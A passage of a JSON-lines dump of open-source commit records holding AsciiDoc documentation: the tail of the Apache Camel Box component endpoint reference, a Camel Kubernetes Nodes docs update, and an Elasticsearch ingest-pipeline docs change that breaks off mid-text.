see\nhttps:\/\/developer.box.com\/reference#events[https:\/\/developer.box.com\/reference#events].\nThe following endpoints can be invoked with the prefix\u00a0*`event-logs`*\u00a0as follows:\n\n[source]\n----\nbox:event-logs\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|getEnterpriseEvents |events |position, after, before, [types] |java.util.List\n|===\n\nURI Options for\u00a0_event-logs_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|position |String\n\n|after |Date\n\n|before |Date\n\n|types |com.box.sdk.BoxEvent.Types[]\n|===\n\n==== Endpoint Prefix\u00a0_files_\n\nFor more information on Box files see\nhttps:\/\/developer.box.com\/reference#file-object[https:\/\/developer.box.com\/reference#file-object].\nThe following endpoints can be invoked with the\nprefix\u00a0*`files`*\u00a0as follows. \n\n[source]\n----\nbox:files\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|uploadFile |upload |parentFolderId, content, fileName, [created], [modified], [size], [listener] |com.box.sdk.BoxFile\n\n|downloadFile |download |fileId, output, [rangeStart], [rangeEnd], [listener] |java.io.OutputStream\n\n|copyFile |copy |fileId, destinationFolderId, [newName] |com.box.sdk.BoxFile\n\n|moveFile |move |fileId, destinationFolderId, [newName] |com.box.sdk.BoxFile\n\n|renameFile |rename |fileId, newFileName |com.box.sdk.BoxFile \n\n|createFileSharedLink |link |fileId, access, [unshareDate], [permissions] |com.box.sdk.BoxSharedLink\n\n|deleteFile |delete |fileId |\n\n|uploadNewFileVersion |uploadVersion |fileId, fileContent, [modified], [fileSize], [listener] |com.box.boxsdk.BoxFile\n\n|promoteFileVersion |promoteVersion |fileId, version |com.box.sdk.BoxFileVersion\n\n|getFileVersions |versions |fileId |java.util.Collection\n\n|downloadPreviousFileVersions |downloadVersion |fileId, version, output, [listener] |java.io.OutputStream\n\n|deleteFileVersion |deleteVersion |fileId, version |\n\n|getFileInfo |info |fileId, fields |com.box.sdk.BoxFile.Info\n\n|updateFileInfo |updateInfo |fileId, info |com.box.sdk.BoxFile\n\n|createFileMetadata |createMetadata |fileId, metadata, [typeName] |com.box.sdk.Metadata\n\n|getFileMetadata |metadata |fileId, [typeName] |com.box.sdk.Metadata\n\n|updateFileMetadata |updateMetadata |fileId, metadata |com.box.sdk.Metadata\n\n|deleteFileMetadata |deleteMetadata |fileId | \n\n|getDownloadUrl |url |fileId |java.net.URL\n\n|getPreviewLink |preview |fileId |java.net.URL\n\n|getFileThumbnail |thumbnail |fileId, fileType, minWidth, minHeight, maxWidth, maxHeight |byte[]\n|===\n\nURI Options for _files_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|parentFolderId |String\n\n|content |java.io.InputStream\n\n|fileName |String\n\n|created |Date\n\n|modified |Date\n\n|size |Long\n\n|listener |com.box.sdk.ProgressListener \n\n|output |java.io.OutputStream\n\n|rangeStart |Long\n\n|rangeEnd |Long\n\n|outputStreams |java.io.OutputStream[]\n\n|destinationFolderId |String\n\n|newName |String\n\n|fields |String[]\n\n|info |com.box.sdk.BoxFile.Info\n\n|fileSize |Long\n\n|version |Integer\n\n|access |com.box.sdk.BoxSharedLink.Access\n\n|unshareDate |Date\n\n|permissions |com.box.sdk.BoxSharedLink.Permissions\n\n|fileType |com.box.sdk.BoxFile.ThumbnailFileType\n\n|minWidth |Integer\n\n|minHeight |Integer\n\n|maxWidth |Integer\n\n|maxHeight |Integer\n\n|metadata |com.box.sdk.Metadata\n\n|typeName |String\n|===\n\n==== Endpoint Prefix _folders_\n\nFor more information on Box folders see\nhttps:\/\/developer.box.com\/reference#folder-object[https:\/\/developer.box.com\/reference#folder-object].\nThe following endpoints can be invoked with the prefix\n*`folders`*\u00a0as follows. \n\n[source]\n----\nbox:folders\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|getRootFolder |root | |com.box.sdk.BoxFolder\n\n|createFolder |create |parentFolderId, folderName |com.box.sdk.BoxFolder\n\n|createFolder |create |parentFolderId, path |com.box.sdk.BoxFolder\n\n|copyFolder |copy |folderId, destinationfolderId, [newName] |com.box.sdk.BoxFolder \n\n|moveFolder |move |folderId, destinationFolderId, newName |com.box.sdk.BoxFolder\n\n|renameFolder |rename |folderId, newFolderName |com.box.sdk.BoxFolder\n\n|createFolderSharedLink |link |folderId, access, [unsharedDate], [permissions] |java.util.List\n\n|deleteFolder |delete |folderId |\n\n|getFolder |folder |path |com.box.sdk.BoxFolder\n\n|getFolderInfo |info |folderId, fields |com.box.sdk.BoxFolder.Info\n\n|getFolderItems |items |folderId, offset, limit, fields |java.util.List\n\n|updateFolderInfo |updateInfo |folderId, info |com.box.sdk.BoxFolder\n|===\n\nURI Options for _folders_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|path |String[]\n\n|folderId |String\n\n|offset |Long\n\n|limit |Long\n\n|fields |String[]\n\n|parentFolderId |String\n\n|folderName |String\n\n|destinationFolderId |String\n\n|newName |String\n\n|newFolderName |String\n\n|info |String\n\n|access |com.box.sdk.BoxSharedLink.Access\n\n|unshareDate |Date\n\n|permissions |com.box.sdk.BoxSharedLink.Permissions\n|===\n\n==== Endpoint Prefix\u00a0_groups_\n\nFor more information on Box groups see\nhttps:\/\/developer.box.com\/reference#group-object[https:\/\/developer.box.com\/reference#group-object].\nThe following endpoints can be invoked with the prefix\u00a0*`groups`*\u00a0as\nfollows:\n\n[source]\n----\nbox:groups\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|createGroup |create |name, [provenance, externalSyncIdentifier, description, invitabilityLevel, memberViewabilityLevel] |com.box.sdk.BoxGroup \n\n|addGroupMembership |createMembership |groupId, userId, role |com.box.sdk.BoxGroupMembership\n\n|deleteGroup |delete |groupId |\n\n|getAllGroups |groups | |java.util.Collection\n\n|getGroupInfo |info |groupId |com.box.sdk.BoxGroup.Info\n\n|updateGroupInfo |updateInfo |groupId, groupInfo |com.box.sdk.BoxGroup\n\n|addGroupMembership |addMembership |groupId, userId, role |com.box.sdk.BoxGroupMembership\n\n|deleteGroupMembership |deleteMembership |groupMembershipId |\n\n|getGroupMemberships |memberships |groupId |java.uti.Collection\n\n|getGroupMembershipInfo |membershipInfo |groupMemebershipId |com.box.sdk.BoxGroup.Info\n\n|updateGroupMembershipInfo |updateMembershipInfo |groupMemebershipId, info |com.box.sdk.BoxGroupMembership\n|===\n\nURI Options for\u00a0_groups_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|name |String\n\n|groupId |String\n\n|userId |String\n\n|role |com.box.sdk.BoxGroupMembership.Role\n\n|groupMembershipId |String\n\n|info |com.box.sdk.BoxGroupMembership.Info\n\n|===\n\n==== Endpoint Prefix\u00a0_search_\n\nFor more information on Box search API see\nhttps:\/\/developer.box.com\/reference#searching-for-content[https:\/\/developer.box.com\/reference#searching-for-content].\u00a0The\nfollowing endpoints can be invoked with the prefix\u00a0*`search`*\u00a0as\nfollows:\n\n[source]\n----\nbox:search\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|searchFolder |search |folderId, query |java.util.Collection\n|===\n\nURI Options for\u00a0_search_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|folderId |String\n\n|query |String\n|===\n\n==== Endpoint Prefix\u00a0_tasks_\n\nFor information on Box tasks see\nhttps:\/\/developer.box.com\/reference#task-object-1[https:\/\/developer.box.com\/reference#task-object-1].\nThe following endpoints can be invoked with the prefix\u00a0*`tasks`*\u00a0as\nfollows:\n\n[source]\n----\nbox:tasks\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|addFileTask |add |fileId, action, dueAt, [message] |com.box.sdk.BoxUser\n\n|deleteTask |delete |taskId |\n\n|getFileTasks |tasks |fileId |java.util.List\n\n|getTaskInfo |info |taskId |com.box.sdk.BoxTask.Info\n\n|updateTaskInfo |updateInfo |taskId, info |com.box.sdk.BoxTask\n\n|addAssignmentToTask |addAssignment |taskId, assignTo |com.box.sdk.BoxTask\n\n|deleteTaskAssignment |deleteAssignment |taskAssignmentId |\n\n|getTaskAssignments |assignments | taskId |java.util.List\n\n|getTaskAssignmentInfo |assignmentInfo |taskAssignmentId |com.box.sdk.BoxTaskAssignment.Info\n|===\n\nURI Options for\u00a0_tasks_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|fileId |String\n\n|action |com.box.sdk.BoxTask.Action\n\n|dueAt |Date\n\n|message |String\n\n|taskId |String\n\n|info |com.box.sdk.BoxTask.Info\n\n|assignTo |com.box.sdk.BoxUser\n\n|taskAssignmentId |String\n|===\n\n==== Endpoint Prefix\u00a0_users_\n\nFor information on Box users see\nhttps:\/\/developer.box.com\/reference#user-object[https:\/\/developer.box.com\/reference#user-object].\nThe following endpoints can be invoked with the prefix\u00a0*`users`*\u00a0as\nfollows:\n\n[source]\n----\nbox:users\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|getCurrentUser |currentUser | |com.box.sdk.BoxUser\n\n|getAllEnterpriseOrExternalUsers |users |filterTerm, [fields] |com.box.sdk.BoxUser\n\n|createAppUser |create |name, [params] |com.box.sdk.BoxUser\n\n|createEnterpriseUser |create |login, name, [params] |com.box.sdk.BoxUser\n\n|deleteUser |delete |userId, notifyUser, force |\n\n|getUserEmailAlias |emailAlias |userId |com.box.sdk.BoxUser\n\n|deleteUserEmailAlias |deleteEmailAlias |userId, emailAliasId |java.util.List\n\n|getUserInfo |info | userId |com.box.sdk.BoxUser.Info\n\n|updateUserInfo |updateInfo |userId, info |com.box.sdk.BoxUser\n\n|moveFolderToUser |- |userId, sourceUserId |com.box.sdk.BoxFolder.Info\n|===\n\nURI Options for\u00a0_users_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|defaultRequest |com.box.restclientv2.requestsbase.BoxDefaultRequestObject\n\n|emailAliasRequest |com.box.boxjavalibv2.requests.requestobjects.BoxEmailAliasRequestObject\n\n|emailId |String\n\n|filterTerm |String\n\n|folderId |String\n\n|simpleUserRequest |com.box.boxjavalibv2.requests.requestobjects.BoxSimpleUserRequestObject\n\n|userDeleteRequest |com.box.boxjavalibv2.requests.requestobjects.BoxUserDeleteRequestObject\n\n|userId |String\n\n|userRequest |com.box.boxjavalibv2.requests.requestobjects.BoxUserRequestObject\n\n|userUpdateLoginRequest |com.box.boxjavalibv2.requests.requestobjects.BoxUserUpdateLoginRequestObject\n|===\n\n=== Consumer Endpoints:\n\nFor more information on Box events see\nhttps:\/\/developer.box.com\/reference#events[https:\/\/developer.box.com\/reference#events].\nConsumer endpoints can only use the endpoint prefix *events* as\nshown in the example next.\n\n[source]\n----\nbox:events\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|events | |[startingPosition] |com.box.sdk.BoxEvent \n|===\n\nURI Options for\u00a0_events_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\",]\n|===\n|Name |Type\n\n|startingPosition |Long\n|===\n\n=== Message header\n\nAny of the options\u00a0can be provided in a message header for producer\nendpoints with *CamelBox.* prefix.\n\n=== Message body\n\nAll result message bodies utilize objects provided by the Box Java SDK.\nProducer endpoints can specify the option name for incoming message body\nin the *inBody* endpoint parameter.\n\n=== Samples\n\nThe following route uploads new files to the user's root folder:\n\n[source,java]\n----\nfrom(\"file:...\")\n .to(\"box:\/\/files\/upload\/inBody=fileUploadRequest\");\n----\n\nThe following route polls user's account for updates:\n\n[source,java]\n----\nfrom(\"box:\/\/events\/listen?startingPosition=-1\")\n .to(\"bean:blah\");\n----\n\nThe following route uses a producer with dynamic header options.\u00a0The\n*fileId*\u00a0property has the Box file id and the *output* property has \nthe output stream of the file contents, so they are assigned to the\n*CamelBox.fileId* header and *CamelBox.output* header respectively\nas follows:\n\n[source,java]\n----\nfrom(\"direct:foo\")\n .setHeader(\"CamelBox.fileId\", header(\"fileId\"))\n .setHeader(\"CamelBox.output\", header(\"output\"))\n .to(\"box:\/\/files\/download\")\n .to(\"file:\/\/...\");\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ee93b7086943d64a9413233985ed5f4cbf0a8b4f","subject":"Camel-Kubernetes: Added supported producer operation to nodes docs","message":"Camel-Kubernetes: Added supported producer operation to nodes docs\n","repos":"zregvart\/camel,alvinkwekel\/camel,tadayosi\/camel,adessaigne\/camel,CodeSmell\/camel,DariusX\/camel,nikhilvibhav\/camel,zregvart\/camel,gnodet\/camel,pax95\/camel,pmoerenhout\/camel,adessaigne\/camel,nicolaferraro\/camel,christophd\/camel,tadayosi\/camel,pax95\/camel,ullgren\/camel,apache\/camel,nikhilvibhav\/camel,mcollovati\/camel,adessaigne\/camel,DariusX\/camel,objectiser\/camel,tdiesler\/camel,apache\/camel,apache\/camel,ullgren\/camel,christophd\/camel,cunningt\/camel,christophd\/camel,ullgren\/camel,objectiser\/camel,DariusX\/camel,pax95\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tdiesler\/camel,cunningt\/camel,ullgren\/camel,CodeSmell\/camel,mcollovati\/camel,adessaigne\/camel,apache\/camel,DariusX\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,gnodet\/camel,christophd\/camel,gnodet\/camel,tadayosi\/camel,pax95\/camel,nicolaferraro\/camel,gnodet\/camel,nicolaferraro\/camel,mcollovati\/camel,pmoerenhout\/camel,christophd\/camel,tadayosi\/camel,alvinkwekel\/camel,cunningt\/camel,cunningt\/camel,tdiesler\/camel,nicolaferraro\/camel,zregvart\/camel,tdiesler\/camel,apache\/camel,objectiser\/camel,adessaigne\/camel,alvinkwekel\/camel,pmoerenhout\/camel,alvinkwekel\/camel,pmoerenhout\/camel,gnodet\/camel,zregvart\/camel,apache\/camel,mcollovati\/camel,CodeSmell\/camel,tdiesler\/camel,tadayosi\/camel,nikhilvibhav\/camel,cunningt\/camel,adessaigne\/camel,nikhilvibhav\/camel,christophd\/camel,tdiesler\/camel,CodeSmell\/camel,pax95\/camel,objectiser\/camel","old_file":"components\/camel-kubernetes\/src\/main\/docs\/kubernetes-nodes-component.adoc","new_file":"components\/camel-kubernetes\/src\/main\/docs\/kubernetes-nodes-component.adoc","new_contents":"[[kubernetes-nodes-component]]\n= Kubernetes Nodes Component\n\n*Available as of Camel version 2.17*\n\nThe Kubernetes Nodes component is one of xref:kubernetes.adoc[Kubernetes Components] which\nprovides a producer to execute kubernetes node operations and a consumer to consume kubernetes\nnode events.\n \n\n\n== Component Options\n\n\/\/ component options: START\nThe Kubernetes Nodes component supports 1 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n|===\n\/\/ component options: END\n\n\n== Endpoint Options\n\n\/\/ endpoint options: START\nThe Kubernetes Nodes endpoint is configured using URI syntax:\n\n----\nkubernetes-nodes:masterUrl\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *masterUrl* | *Required* Kubernetes Master url | | String\n|===\n\n\n=== Query Parameters (30 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *apiVersion* (common) | The Kubernetes API Version to use | | String\n| *dnsDomain* (common) | The dns domain, used for ServiceCall EIP | | String\n| *kubernetesClient* (common) | Default KubernetesClient to use if provided | | KubernetesClient\n| *portName* (common) | The port name, used for ServiceCall EIP | | String\n| *portProtocol* (common) | The port protocol, used for ServiceCall EIP | tcp | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *labelKey* (consumer) | The Consumer Label key when watching at some resources | | String\n| *labelValue* (consumer) | The Consumer Label value when watching at some resources | | String\n| *namespace* (consumer) | The namespace | | String\n| *poolSize* (consumer) | The Consumer pool size | 1 | int\n| *resourceName* (consumer) | The Consumer Resource Name we would like to watch | | String\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | Producer operation to do on Kubernetes | | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *connectionTimeout* (advanced) | Connection timeout in milliseconds to use when making requests to the Kubernetes API server. | | Integer\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *caCertData* (security) | The CA Cert Data | | String\n| *caCertFile* (security) | The CA Cert File | | String\n| *clientCertData* (security) | The Client Cert Data | | String\n| *clientCertFile* (security) | The Client Cert File | | String\n| *clientKeyAlgo* (security) | The Key Algorithm used by the client | | String\n| *clientKeyData* (security) | The Client Key data | | String\n| *clientKeyFile* (security) | The Client Key file | | String\n| *clientKeyPassphrase* (security) | The Client Key Passphrase | | String\n| *oauthToken* (security) | The Auth Token | | String\n| *password* (security) | Password to connect to Kubernetes | | String\n| *trustCerts* (security) | Define if the certs we used are trusted anyway or not | | Boolean\n| *username* (security) | Username to connect to Kubernetes | | String\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-kubernetes-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 2 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.kubernetes-nodes.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.kubernetes-nodes.enabled* | Whether to enable auto configuration of the kubernetes-nodes component. This is enabled by default. | | Boolean\n|===\n\/\/ spring-boot-auto-configure options: END\n\n== Supported producer operation\n\n- listNodes\n- listNodesByLabels\n- getNode\n- createNode\n- deleteNode\n\n","old_contents":"[[kubernetes-nodes-component]]\n= Kubernetes Nodes Component\n\n*Available as of Camel version 2.17*\n\nThe Kubernetes Nodes component is one of xref:kubernetes.adoc[Kubernetes Components] which\nprovides a producer to execute kubernetes node operations and a consumer to consume kubernetes\nnode events.\n \n\n\n== Component Options\n\n\/\/ component options: START\nThe Kubernetes Nodes component supports 1 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n|===\n\/\/ component options: END\n\n\n== Endpoint Options\n\n\/\/ endpoint options: START\nThe Kubernetes Nodes endpoint is configured using URI syntax:\n\n----\nkubernetes-nodes:masterUrl\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *masterUrl* | *Required* Kubernetes Master url | | String\n|===\n\n\n=== Query Parameters (30 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *apiVersion* (common) | The Kubernetes API Version to use | | String\n| *dnsDomain* (common) | The dns domain, used for ServiceCall EIP | | String\n| *kubernetesClient* (common) | Default KubernetesClient to use if provided | | KubernetesClient\n| *portName* (common) | The port name, used for ServiceCall EIP | | String\n| *portProtocol* (common) | The port protocol, used for ServiceCall EIP | tcp | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *labelKey* (consumer) | The Consumer Label key when watching at some resources | | String\n| *labelValue* (consumer) | The Consumer Label value when watching at some resources | | String\n| *namespace* (consumer) | The namespace | | String\n| *poolSize* (consumer) | The Consumer pool size | 1 | int\n| *resourceName* (consumer) | The Consumer Resource Name we would like to watch | | String\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | Producer operation to do on Kubernetes | | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *connectionTimeout* (advanced) | Connection timeout in milliseconds to use when making requests to the Kubernetes API server. | | Integer\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *caCertData* (security) | The CA Cert Data | | String\n| *caCertFile* (security) | The CA Cert File | | String\n| *clientCertData* (security) | The Client Cert Data | | String\n| *clientCertFile* (security) | The Client Cert File | | String\n| *clientKeyAlgo* (security) | The Key Algorithm used by the client | | String\n| *clientKeyData* (security) | The Client Key data | | String\n| *clientKeyFile* (security) | The Client Key file | | String\n| *clientKeyPassphrase* (security) | The Client Key Passphrase | | String\n| *oauthToken* (security) | The Auth Token | | String\n| *password* (security) | Password to connect to Kubernetes | | String\n| *trustCerts* (security) | Define if the certs we used are trusted anyway or not | | Boolean\n| *username* (security) | Username to connect to Kubernetes | | String\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-kubernetes-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 2 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.kubernetes-nodes.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.kubernetes-nodes.enabled* | Whether to enable auto configuration of the kubernetes-nodes component. This is enabled by default. | | Boolean\n|===\n\/\/ spring-boot-auto-configure options: END\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0fe62de217aeefc69c7272a558e9884a359657c4","subject":"show a full ingest example in the index page, to let user fast understand ingest node. (#43476)","message":"show a full ingest example in the index page, to let user fast understand ingest node. (#43476)\n\n","repos":"scorpionvicky\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/reference\/ingest.asciidoc","new_file":"docs\/reference\/ingest.asciidoc","new_contents":"[[ingest]]\n= Ingest node\n\n[partintro]\n--\nUse an ingest node to pre-process documents before the actual document indexing happens. \nThe ingest node intercepts bulk and index requests, it applies transformations, and it then\npasses the documents back to the index or bulk APIs.\n\nAll nodes enable ingest by default, so any node can handle ingest tasks. You can also create\ndedicated ingest nodes. To disable ingest for a node, configure the following setting in the\nelasticsearch.yml file:\n\n[source,yaml]\n--------------------------------------------------\nnode.ingest: false\n--------------------------------------------------\n\nTo pre-process documents before indexing, <<pipeline,define a pipeline>> that specifies a series of\n<<ingest-processors,processors>>. Each processor transforms the document in some specific way. For example, a\npipeline might have one processor that removes a field from the document, followed by\nanother processor that renames a field. The <<cluster-state,cluster state>> then stores\nthe configured pipelines.\n\nTo use a pipeline, simply specify the `pipeline` parameter on an index or bulk request. This\nway, the ingest node knows which pipeline to use. \n\nFor example:\nCreate a pipeline\n\n[source,js]\n--------------------------------------------------\nPUT _ingest\/pipeline\/my_pipeline_id\n{\n \"description\" : \"describe pipeline\",\n \"processors\" : [\n {\n \"set\" : {\n \"field\": \"foo\",\n \"value\": \"new\"\n }\n }\n ]\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST\n\nIndex with defined pipeline\n\n[source,js]\n--------------------------------------------------\nPUT my-index\/_doc\/my-id?pipeline=my_pipeline_id\n{\n \"foo\": \"bar\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nResponse\uff1a\n[source,js]\n--------------------------------------------------\n{\n \"_index\" : \"my-index\",\n \"_type\" : \"_doc\",\n \"_id\" : \"my-id\",\n \"_version\" : 1,\n \"result\" : \"created\",\n \"_shards\" : {\n \"total\" : 2,\n \"successful\" : 2,\n \"failed\" : 0\n },\n \"_seq_no\" : 0,\n \"_primary_term\" : 1\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"successful\" : 2\/\"successful\" : 1\/]\n\nAn index may also declare a <<dynamic-index-settings,default pipeline>> that will be used in the\nabsence of the `pipeline` parameter.\n\nSee <<ingest-apis,Ingest APIs>> for more information about creating, adding, and deleting pipelines.\n\n--\n\ninclude::ingest\/ingest-node.asciidoc[]\n","old_contents":"[[ingest]]\n= Ingest node\n\n[partintro]\n--\nUse an ingest node to pre-process documents before the actual document indexing happens. \nThe ingest node intercepts bulk and index requests, it applies transformations, and it then\npasses the documents back to the index or bulk APIs.\n\nAll nodes enable ingest by default, so any node can handle ingest tasks. You can also create\ndedicated ingest nodes. To disable ingest for a node, configure the following setting in the\nelasticsearch.yml file:\n\n[source,yaml]\n--------------------------------------------------\nnode.ingest: false\n--------------------------------------------------\n\nTo pre-process documents before indexing, <<pipeline,define a pipeline>> that specifies a series of\n<<ingest-processors,processors>>. Each processor transforms the document in some specific way. For example, a\npipeline might have one processor that removes a field from the document, followed by\nanother processor that renames a field. The <<cluster-state,cluster state>> then stores\nthe configured pipelines.\n\nTo use a pipeline, simply specify the `pipeline` parameter on an index or bulk request. This\nway, the ingest node knows which pipeline to use. For example:\n\n[source,js]\n--------------------------------------------------\nPUT my-index\/_doc\/my-id?pipeline=my_pipeline_id\n{\n \"foo\": \"bar\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[catch:bad_request]\n\nAn index may also declare a <<dynamic-index-settings,default pipeline>> that will be used in the\nabsence of the `pipeline` parameter.\n\nSee <<ingest-apis,Ingest APIs>> for more information about creating, adding, and deleting 